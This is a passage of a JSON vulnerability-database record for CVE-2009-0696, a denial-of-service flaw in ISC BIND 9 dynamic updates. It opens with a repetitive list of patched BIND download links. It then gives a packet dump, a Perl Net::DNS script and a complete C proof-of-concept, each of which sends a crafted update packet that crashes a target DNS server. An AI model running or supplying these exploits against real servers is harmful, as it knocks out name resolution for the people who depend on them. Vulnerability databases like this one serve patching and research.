bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4 b3\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4 b1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4.1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4.1 -P1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4.2 P2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4.2 P2-W2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4.2 P2-W1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4.3 P1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4.3\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4.3\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.5 a1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.5 a2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.5 P2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.5 P2-W2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.5 P2-W1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.5.1 P1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.6 P1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.6\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz", "published": "2009-07-29T00:00:00", "type": "seebug", "title": "ISC BIND 9\u8fdc\u7a0b\u52a8\u6001\u66f4\u65b0\u6d88\u606f\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0696"], "modified": "2009-07-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11919", "id": "SSV:11919", "sourceData": "\n \u5982\u4e0b\u66f4\u65b0\u62a5\u6587\u53ef\u5bfc\u81f4BIND\u5d29\u6e83:\r\nPacket in tcpdump:\r\n15:38:11.676045 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: UDP (17), length: 178) 10.2.0.205.59447 > 10.2.0.205.53: 17378 update [1a] [1n] [1au] SOA? 8.0.10.in-addr.arpa. 8.8.0.10.in-addr.arpa. ANY ns: [|domain]\r\nAnother view of the Packet:\r\n| ;; HEADER SECTION\r\n| ;; id = 181\r\n| ;; qr = 0 opcode = UPDATE rcode = NOERROR\r\n| ;; zocount = 1 prcount = 1 upcount = 1 adcount = 1\r\n|\r\n| ;; ZONE SECTION (1 record)\r\n| ;; 8.0.10.in-addr.arpa. IN SOA\r\n|\r\n| ;; PREREQUISITE SECTION (1 record)\r\n| 4.8.0.10.in-addr.arpa. 0 IN ANY ; no data\r\n|\r\n| ;; UPDATE SECTION (1 record)\r\n| 4.8.0.10.in-addr.arpa. 0 ANY ANY ; no data\r\n|\r\n| ;; ADDITIONAL SECTION (1 record)\r\n| office.example.com. 0 ANY TSIG HMAC-MD5.SIG-ALG.REG.INT. NOERROR\r\n-----------------\r\n#!/usr/bin/perl -w\r\nuse Net::DNS;\r\nour $NSI = '<dns server>';\r\nour $NSI_KEY_NAME = '<key name>';\r\nour $NSI_KEY = '<key>';\r\nmy $rzone = '<zone>';\r\nmy $rptr = "1.$rzone";\r\nmy $packet = Net::DNS::Update->new($rzone);\r\n$packet->push(\r\n pre => Net::DNS::RR->new(\r\n Name => $rptr,\r\n Class => 'IN',\r\n Type => 'ANY',\r\n TTL => 0,\r\n )\r\n);\r\n$packet->push(\r\n update => Net::DNS::RR->new(\r\n Name => $rptr,\r\n Class => 'ANY',\r\n Type => 'ANY',\r\n )\r\n);\r\n$packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY;\r\nprint $packet->string;\r\nNet::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);\r\n \n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11919", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T10:17:49", "description": "ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC. CVE-2009-0696. Dos exploits for multiple platform", "published": "2009-07-30T00:00:00", "type": "exploitdb", "title": "ISC BIND 9 - Remote Dynamic Update Message Denial of Service PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0696"], "modified": "2009-07-30T00:00:00", "id": "EDB-ID:9300", "href": "https://www.exploit-db.com/exploits/9300/", "sourceData": "/*\r\n ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC\r\n \"Based on:\r\n http://www.securityfocus.com/data/vulnerabilities/exploits/35848.txt\r\n by kingcope - this is basically a rewrite of the above, lame i know, but fun enough\r\n \r\n for the [zone] argument you can try what is in the named.conf with \"type master\"\r\n*/\r\n \r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n \r\n#define PORT 31337\r\n \r\nstruct dnspkt1 {\r\n unsigned short transact;\r\n unsigned short flags;\r\n unsigned short zones;\r\n unsigned short pr;\r\n unsigned short updates;\r\n unsigned short rrs;\r\n};\r\n \r\nstruct dnspkt2 {\r\n unsigned short type;\r\n unsigned short class;\r\n unsigned short name2;\r\n unsigned short type2;\r\n unsigned short class2;\r\n unsigned short ttl1;\r\n unsigned short ttl2;\r\n unsigned short datalen;\r\n unsigned short name3;\r\n unsigned short type3;\r\n unsigned short class3;\r\n unsigned short ttl3;\r\n unsigned short ttl4;\r\n unsigned short datalen2;\r\n};\r\n \r\nint packdomain(char * dest, const char *src)\r\n{\r\n int i,n,cnt;\r\n \r\n n=strlen(src);\r\n dest[n+1]=0; // terminator\r\n \r\n cnt=0;\r\n for (i=n; i>0; i--)\r\n {\r\n if (src[i-1]=='.')\r\n {\r\n dest[i]=cnt;\r\n cnt=0;\r\n }\r\n else\r\n {\r\n dest[i]=src[i-1];\r\n cnt++;\r\n }\r\n }\r\n dest[0]=cnt;\r\n return n+2;\r\n}\r\n \r\nint main(int argc, char **argv) {\r\n int sockfd, clilen;\r\n struct sockaddr_in serv_addr, cli_addr;\r\n struct dnspkt1 d1;\r\n struct dnspkt2 d2;\r\n \r\n printf(\"ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC\\n\");\r\n printf(\"Based on:\\n\");\r\n printf(\"http://www.securityfocus.com/data/vulnerabilities/exploits/35848.txt\\n\");\r\n printf(\"by kingcope - this is basically a rewrite of the above, lame i know, but fun tough\\n\");\r\n \r\n if (argc < 2) {\r\n printf(\"usage: %s <host> [zone]\\n\", argv[0]);\r\n return 0;\r\n }\r\n \r\n sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sockfd < 0) {\r\n printf(\"error on socket() call\");\r\n return -1;\r\n }\r\n \r\n memset(&serv_addr, '\\0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_addr.s_addr = INADDR_ANY;\r\n serv_addr.sin_port = htons(PORT);\r\n \r\n if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) {\r\n printf(\"error binding socket\\n\");\r\n return -1;\r\n }\r\n \r\n memset(&cli_addr, '\\0', sizeof(cli_addr));\r\n cli_addr.sin_family = AF_INET;\r\n cli_addr.sin_addr.s_addr = inet_addr(argv[1]);\r\n cli_addr.sin_port = htons(53);\r\n \r\n memset(&d1, '\\0', sizeof(d1));\r\n memset(&d2, '\\0', sizeof(d2));\r\n d1.transact = htons(0x1cd6);\r\n d1.flags = htons(0x2800);\r\n d1.zones = htons(0x0001);\r\n d1.pr = htons(0x0001);\r\n d1.updates = htons(0x0001);\r\n d1.rrs = 0;\r\n char *name = (char*)malloc(8096);\r\n char nam[1024];\r\n \r\n if (argc < 3) {\r\n /* Not sure if this is right to set as default, have no clue about dns proto\r\n It works for me.. */\r\n strcpy(nam, \"127.in-addr.arpa\");\r\n } else {\r\n strncpy(nam, argv[2], sizeof(nam));\r\n nam[sizeof(nam)-1]=0;\r\n }\r\n \r\n int n=packdomain(name, (char*)nam);\r\n d2.type = htons(0x0006);\r\n d2.class = htons(0x0001);\r\n d2.name2 = htons(0xc00c);\r\n d2.type2 = htons(0x00ff);\r\n d2.class2 = htons(0x0001);\r\n d2.datalen = 0;\r\n d2.name3 = htons(0xc00c);\r\n d2.type3 = htons(0x00ff);\r\n d2.class3 = htons(0x00ff);\r\n d2.ttl1 = 0;\r\n d2.ttl2 = 0;\r\n d2.ttl3 = 0;\r\n d2.ttl4 = 0;\r\n d2.datalen2 = 0;\r\n \r\n char buffer[10000];\r\n memcpy(buffer, &d1, sizeof(d1));\r\n memcpy(buffer+sizeof(d1), name, n);\r\n memcpy(buffer+sizeof(d1)+n, &d2, sizeof(d2));\r\n \r\n clilen=sizeof(cli_addr);\r\n \r\n sendto(sockfd, buffer, sizeof(d1)+sizeof(d2)+n, 0, (struct sockaddr *)&cli_addr, sizeof(cli_addr));\r\n printf(\"aight!\\n\");\r\n return 0;\r\n}\r\n\r\n// milw0rm.com [2009-07-30]\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9300/"}]}
